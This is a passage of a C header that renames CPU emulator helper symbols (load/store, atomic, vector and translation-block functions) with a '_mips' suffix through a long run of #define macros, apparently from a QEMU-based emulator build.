cpu_ldq_data_ra_mips #define cpu_ldub_data cpu_ldub_data_mips #define cpu_ldsb_data cpu_ldsb_data_mips #define cpu_lduw_data cpu_lduw_data_mips #define cpu_ldsw_data cpu_ldsw_data_mips #define cpu_ldl_data cpu_ldl_data_mips #define cpu_ldq_data cpu_ldq_data_mips #define helper_ret_stb_mmu helper_ret_stb_mmu_mips #define helper_le_stw_mmu helper_le_stw_mmu_mips #define helper_be_stw_mmu helper_be_stw_mmu_mips #define helper_le_stl_mmu helper_le_stl_mmu_mips #define 
helper_be_stl_mmu helper_be_stl_mmu_mips #define helper_le_stq_mmu helper_le_stq_mmu_mips #define helper_be_stq_mmu helper_be_stq_mmu_mips #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_mips #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_mips #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_mips #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_mips #define cpu_stb_data_ra cpu_stb_data_ra_mips #define cpu_stw_data_ra cpu_stw_data_ra_mips #define cpu_stl_data_ra cpu_stl_data_ra_mips #define cpu_stq_data_ra cpu_stq_data_ra_mips #define cpu_stb_data cpu_stb_data_mips #define cpu_stw_data cpu_stw_data_mips #define cpu_stl_data cpu_stl_data_mips #define cpu_stq_data cpu_stq_data_mips #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_mips #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_mips #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_mips #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_mips #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_mips #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_mips #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_mips #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_mips #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_mips #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_mips #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_mips #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_mips #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_mips #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_mips #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_mips #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_mips #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_mips #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_mips #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_mips #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_mips #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_mips #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_mips #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_mips #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_mips #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_mips #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_mips #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_mips #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_mips #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_mips #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_mips #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_mips #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_mips #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_mips #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_mips #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_mips #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_mips #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_mips #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_mips #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_mips 
#define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_mips #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_mips #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_mips #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_mips #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_mips #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_mips #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_mips #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_mips #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_mips #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_mips #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_mips #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_mips #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_mips #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_mips #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_mips #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_mips #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_mips #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_mips #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_mips #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_mips #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_mips #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_mips #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_mips #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_mips #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_mips #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_mips #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_mips #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_mips #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_mips #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_mips #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_mips #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_mips #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_mips #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_mips #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_mips #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_mips #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_mips #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_mips #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_mips #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_mips #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_mips #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_mips #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_mips #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_mips #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_mips #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_mips #define 
helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_mips #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_mips #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_mips #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_mips #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_mips #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_mips #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_mips #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_mips #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_mips #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_mips #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_mips #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_mips #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_mips #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_mips #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_mips #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_mips #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_mips #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_mips #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_mips #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_mips #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_mips #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_mips #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_mips #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_mips #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_mips #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_mips #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_mips #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_mips #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_mips #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_mips #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_mips #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_mips #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_mips #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_mips #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_mips #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_mips #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_mips #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_mips #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_mips #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_mips #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_mips #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_mips #define helper_atomic_xchgb helper_atomic_xchgb_mips #define helper_atomic_fetch_addb helper_atomic_fetch_addb_mips #define helper_atomic_fetch_andb helper_atomic_fetch_andb_mips #define helper_atomic_fetch_orb helper_atomic_fetch_orb_mips #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_mips #define helper_atomic_add_fetchb 
helper_atomic_add_fetchb_mips #define helper_atomic_and_fetchb helper_atomic_and_fetchb_mips #define helper_atomic_or_fetchb helper_atomic_or_fetchb_mips #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_mips #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_mips #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_mips #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_mips #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_mips #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_mips #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_mips #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_mips #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_mips #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_mips #define helper_atomic_xchgw_le helper_atomic_xchgw_le_mips #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_mips #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_mips #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_mips #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_mips #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_mips #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_mips #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_mips #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_mips #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_mips #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_mips #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_mips #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_mips #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_mips #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_mips #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_mips #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_mips #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_mips #define helper_atomic_xchgw_be helper_atomic_xchgw_be_mips #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_mips #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_mips #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_mips #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_mips #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_mips #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_mips #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_mips #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_mips #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_mips #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_mips #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_mips #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_mips #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_mips #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_mips #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_mips #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_mips #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_mips #define helper_atomic_xchgl_le helper_atomic_xchgl_le_mips #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_mips #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_mips #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_mips #define 
helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_mips #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_mips #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_mips #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_mips #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_mips #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_mips #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_mips #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_mips #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_mips #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_mips #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_mips #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_mips #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_mips #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_mips #define helper_atomic_xchgl_be helper_atomic_xchgl_be_mips #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_mips #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_mips #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_mips #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_mips #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_mips #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_mips #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_mips #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_mips #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_mips #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_mips #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_mips #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_mips #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_mips #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_mips #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_mips #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_mips #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_mips #define helper_atomic_xchgq_le helper_atomic_xchgq_le_mips #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_mips #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_mips #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_mips #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_mips #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_mips #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_mips #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_mips #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_mips #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_mips #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_mips #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_mips #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_mips #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_mips #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_mips #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_mips #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_mips #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_mips #define helper_atomic_xchgq_be helper_atomic_xchgq_be_mips #define helper_atomic_fetch_andq_be 
helper_atomic_fetch_andq_be_mips #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_mips #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_mips #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_mips #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_mips #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_mips #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_mips #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_mips #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_mips #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_mips #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_mips #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_mips #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_mips #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_mips #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_mips #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_mips #define cpu_ldub_code cpu_ldub_code_mips #define cpu_lduw_code cpu_lduw_code_mips #define cpu_ldl_code cpu_ldl_code_mips #define cpu_ldq_code cpu_ldq_code_mips #define helper_div_i32 helper_div_i32_mips #define helper_rem_i32 helper_rem_i32_mips #define helper_divu_i32 helper_divu_i32_mips #define helper_remu_i32 helper_remu_i32_mips #define helper_shl_i64 helper_shl_i64_mips #define helper_shr_i64 helper_shr_i64_mips #define helper_sar_i64 helper_sar_i64_mips #define helper_div_i64 helper_div_i64_mips #define helper_rem_i64 helper_rem_i64_mips #define helper_divu_i64 helper_divu_i64_mips #define helper_remu_i64 helper_remu_i64_mips #define helper_muluh_i64 helper_muluh_i64_mips #define helper_mulsh_i64 helper_mulsh_i64_mips #define helper_clz_i32 helper_clz_i32_mips #define helper_ctz_i32 helper_ctz_i32_mips #define helper_clz_i64 helper_clz_i64_mips #define helper_ctz_i64 helper_ctz_i64_mips #define helper_clrsb_i32 helper_clrsb_i32_mips #define helper_clrsb_i64 helper_clrsb_i64_mips #define helper_ctpop_i32 helper_ctpop_i32_mips #define helper_ctpop_i64 helper_ctpop_i64_mips #define helper_lookup_tb_ptr helper_lookup_tb_ptr_mips #define helper_exit_atomic helper_exit_atomic_mips #define helper_gvec_add8 helper_gvec_add8_mips #define helper_gvec_add16 helper_gvec_add16_mips #define helper_gvec_add32 helper_gvec_add32_mips #define helper_gvec_add64 helper_gvec_add64_mips #define helper_gvec_adds8 helper_gvec_adds8_mips #define helper_gvec_adds16 helper_gvec_adds16_mips #define helper_gvec_adds32 helper_gvec_adds32_mips #define helper_gvec_adds64 helper_gvec_adds64_mips #define helper_gvec_sub8 helper_gvec_sub8_mips #define helper_gvec_sub16 helper_gvec_sub16_mips #define helper_gvec_sub32 helper_gvec_sub32_mips #define helper_gvec_sub64 helper_gvec_sub64_mips #define helper_gvec_subs8 helper_gvec_subs8_mips #define helper_gvec_subs16 helper_gvec_subs16_mips #define helper_gvec_subs32 helper_gvec_subs32_mips #define helper_gvec_subs64 helper_gvec_subs64_mips #define helper_gvec_mul8 helper_gvec_mul8_mips #define helper_gvec_mul16 helper_gvec_mul16_mips #define helper_gvec_mul32 helper_gvec_mul32_mips #define helper_gvec_mul64 helper_gvec_mul64_mips #define helper_gvec_muls8 helper_gvec_muls8_mips #define helper_gvec_muls16 helper_gvec_muls16_mips #define helper_gvec_muls32 helper_gvec_muls32_mips #define helper_gvec_muls64 helper_gvec_muls64_mips #define helper_gvec_neg8 helper_gvec_neg8_mips #define helper_gvec_neg16 
helper_gvec_neg16_mips #define helper_gvec_neg32 helper_gvec_neg32_mips #define helper_gvec_neg64 helper_gvec_neg64_mips #define helper_gvec_abs8 helper_gvec_abs8_mips #define helper_gvec_abs16 helper_gvec_abs16_mips #define helper_gvec_abs32 helper_gvec_abs32_mips #define helper_gvec_abs64 helper_gvec_abs64_mips #define helper_gvec_mov helper_gvec_mov_mips #define helper_gvec_dup64 helper_gvec_dup64_mips #define helper_gvec_dup32 helper_gvec_dup32_mips #define helper_gvec_dup16 helper_gvec_dup16_mips #define helper_gvec_dup8 helper_gvec_dup8_mips #define helper_gvec_not helper_gvec_not_mips #define helper_gvec_and helper_gvec_and_mips #define helper_gvec_or helper_gvec_or_mips #define helper_gvec_xor helper_gvec_xor_mips #define helper_gvec_andc helper_gvec_andc_mips #define helper_gvec_orc helper_gvec_orc_mips #define helper_gvec_nand helper_gvec_nand_mips #define helper_gvec_nor helper_gvec_nor_mips #define helper_gvec_eqv helper_gvec_eqv_mips #define helper_gvec_ands helper_gvec_ands_mips #define helper_gvec_xors helper_gvec_xors_mips #define helper_gvec_ors helper_gvec_ors_mips #define helper_gvec_shl8i helper_gvec_shl8i_mips #define helper_gvec_shl16i helper_gvec_shl16i_mips #define helper_gvec_shl32i helper_gvec_shl32i_mips #define helper_gvec_shl64i helper_gvec_shl64i_mips #define helper_gvec_shr8i helper_gvec_shr8i_mips #define helper_gvec_shr16i helper_gvec_shr16i_mips #define helper_gvec_shr32i helper_gvec_shr32i_mips #define helper_gvec_shr64i helper_gvec_shr64i_mips #define helper_gvec_sar8i helper_gvec_sar8i_mips #define helper_gvec_sar16i helper_gvec_sar16i_mips #define helper_gvec_sar32i helper_gvec_sar32i_mips #define helper_gvec_sar64i helper_gvec_sar64i_mips #define helper_gvec_shl8v helper_gvec_shl8v_mips #define helper_gvec_shl16v helper_gvec_shl16v_mips #define helper_gvec_shl32v helper_gvec_shl32v_mips #define helper_gvec_shl64v helper_gvec_shl64v_mips #define helper_gvec_shr8v helper_gvec_shr8v_mips #define helper_gvec_shr16v helper_gvec_shr16v_mips #define helper_gvec_shr32v helper_gvec_shr32v_mips #define helper_gvec_shr64v helper_gvec_shr64v_mips #define helper_gvec_sar8v helper_gvec_sar8v_mips #define helper_gvec_sar16v helper_gvec_sar16v_mips #define helper_gvec_sar32v helper_gvec_sar32v_mips #define helper_gvec_sar64v helper_gvec_sar64v_mips #define helper_gvec_eq8 helper_gvec_eq8_mips #define helper_gvec_ne8 helper_gvec_ne8_mips #define helper_gvec_lt8 helper_gvec_lt8_mips #define helper_gvec_le8 helper_gvec_le8_mips #define helper_gvec_ltu8 helper_gvec_ltu8_mips #define helper_gvec_leu8 helper_gvec_leu8_mips #define helper_gvec_eq16 helper_gvec_eq16_mips #define helper_gvec_ne16 helper_gvec_ne16_mips #define helper_gvec_lt16 helper_gvec_lt16_mips #define helper_gvec_le16 helper_gvec_le16_mips #define helper_gvec_ltu16 helper_gvec_ltu16_mips #define helper_gvec_leu16 helper_gvec_leu16_mips #define helper_gvec_eq32 helper_gvec_eq32_mips #define helper_gvec_ne32 helper_gvec_ne32_mips #define helper_gvec_lt32 helper_gvec_lt32_mips #define helper_gvec_le32 helper_gvec_le32_mips #define helper_gvec_ltu32 helper_gvec_ltu32_mips #define helper_gvec_leu32 helper_gvec_leu32_mips #define helper_gvec_eq64 helper_gvec_eq64_mips #define helper_gvec_ne64 helper_gvec_ne64_mips #define helper_gvec_lt64 helper_gvec_lt64_mips #define helper_gvec_le64 helper_gvec_le64_mips #define helper_gvec_ltu64 helper_gvec_ltu64_mips #define helper_gvec_leu64 helper_gvec_leu64_mips #define helper_gvec_ssadd8 helper_gvec_ssadd8_mips #define helper_gvec_ssadd16 helper_gvec_ssadd16_mips 
#define helper_gvec_ssadd32 helper_gvec_ssadd32_mips #define helper_gvec_ssadd64 helper_gvec_ssadd64_mips #define helper_gvec_sssub8 helper_gvec_sssub8_mips #define helper_gvec_sssub16 helper_gvec_sssub16_mips #define helper_gvec_sssub32 helper_gvec_sssub32_mips #define helper_gvec_sssub64 helper_gvec_sssub64_mips #define helper_gvec_usadd8 helper_gvec_usadd8_mips #define helper_gvec_usadd16 helper_gvec_usadd16_mips #define helper_gvec_usadd32 helper_gvec_usadd32_mips #define helper_gvec_usadd64 helper_gvec_usadd64_mips #define helper_gvec_ussub8 helper_gvec_ussub8_mips #define helper_gvec_ussub16 helper_gvec_ussub16_mips #define helper_gvec_ussub32 helper_gvec_ussub32_mips #define helper_gvec_ussub64 helper_gvec_ussub64_mips #define helper_gvec_smin8 helper_gvec_smin8_mips #define helper_gvec_smin16 helper_gvec_smin16_mips #define helper_gvec_smin32 helper_gvec_smin32_mips #define helper_gvec_smin64 helper_gvec_smin64_mips #define helper_gvec_smax8 helper_gvec_smax8_mips #define helper_gvec_smax16 helper_gvec_smax16_mips #define helper_gvec_smax32 helper_gvec_smax32_mips #define helper_gvec_smax64 helper_gvec_smax64_mips #define helper_gvec_umin8 helper_gvec_umin8_mips #define helper_gvec_umin16 helper_gvec_umin16_mips #define helper_gvec_umin32 helper_gvec_umin32_mips #define helper_gvec_umin64 helper_gvec_umin64_mips #define helper_gvec_umax8 helper_gvec_umax8_mips #define helper_gvec_umax16 helper_gvec_umax16_mips #define helper_gvec_umax32 helper_gvec_umax32_mips #define helper_gvec_umax64 helper_gvec_umax64_mips #define helper_gvec_bitsel helper_gvec_bitsel_mips #define cpu_restore_state cpu_restore_state_mips #define page_collection_lock page_collection_lock_mips #define page_collection_unlock page_collection_unlock_mips #define free_code_gen_buffer free_code_gen_buffer_mips #define tcg_exec_init tcg_exec_init_mips #define tb_cleanup tb_cleanup_mips #define tb_flush tb_flush_mips #define tb_phys_invalidate tb_phys_invalidate_mips #define tb_gen_code tb_gen_code_mips #define tb_exec_lock tb_exec_lock_mips #define tb_exec_unlock tb_exec_unlock_mips #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_mips #define tb_invalidate_phys_range 